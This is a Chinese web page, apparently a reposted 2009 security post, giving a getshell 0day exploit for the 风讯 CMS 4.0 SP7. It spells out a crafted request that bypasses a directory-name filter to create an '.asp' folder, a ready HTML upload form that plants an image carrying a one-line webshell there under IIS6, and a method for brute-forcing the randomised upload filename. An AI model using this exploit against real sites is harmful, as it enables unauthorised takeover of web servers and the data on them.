风讯4.0 SP7 getshell 0daypc软件 文章资讯 手机软件

您当前的位置→图文中心新闻资讯安全播报风讯4.0 SP7 getshell 0day

风讯4.0 SP7 getshell 0day


2009/7/12  编辑:佚名 来源:本站整理  关键词:

风讯4.0 SP7 getshell 0day

 

发现者:bloodsword、bink, 转载请无视
反应影响版本:<=4.0 sp7, 前面的版本没去看, 估计也能日。
利用条件, 启动了文件程序上传功能, iis6环境。

漏洞描述:建立目录的地方, 名称过滤上有失误, 导致可以能够绕过过滤建立一个.asp目录
最先是注册个账号访问http://www.bbb.com/User/CommPages/FolderImageList.asp?f_UserNumber=06150583700&Type=AddFolder&Path=/userfiles/06150583700/aaa.asp//&CurrPath=/userfiles/06150583700
其中这个06150583700是您的userid, 登录了直接可以能够看到, 建立一个.asp目录

因为风讯浏览目录的地方也过滤了., 所以建立的子目录进不去。 本地构造表单:

<form name="FileForm" method="post" enctype="multipart/form-data"

action="http://www.bbb.com/User/Commpages/UpFileSave.asp?Path=/userfiles/06150583700/aaa.asp";>
    <input type="hidden" name="AutoReName" value="2"><br>
    <input type="hidden" name="Path" value="/userfiles/06150583700/aaa.asp">
    <input type="file" size="20" name="File1">
    <input type="hidden" name="FilesNum" value="1">
    <input type="submit" id="BtnSubmit" name="Submit" value=" 确 定 ">
    <input type="reset" id="ResetForm" name="Submit3" value=" 重 填 ">
</form>
传个夹带一句话的图片PHOTO上去
恶心的地方来了, 传上去的文件程序名是日期+时间+5位随机数(有可能是4位3位2位1位, 反正最大5位), 这个我跟bink研究了半天, 没有

办法看到-_-, 用管中窥豹有个暴力猜接上传路径的功能, 先就在正常目录里上传个文件程序, 卡一下本地跟远程的时间差, 之后传到.asp

目录里, 把秒数误差控制就在3秒以内, 现在开始跑吧~~之后我自己该干嘛干嘛去,RP过关的话几个小时内应该能出结果-_-

相关文章
  • 风讯4.0 SP7 getshell 0day
  • 发表评论
    阅读排行
    相关热门
    网站帮助 - 广告合作 - 下载声明 - 网站地图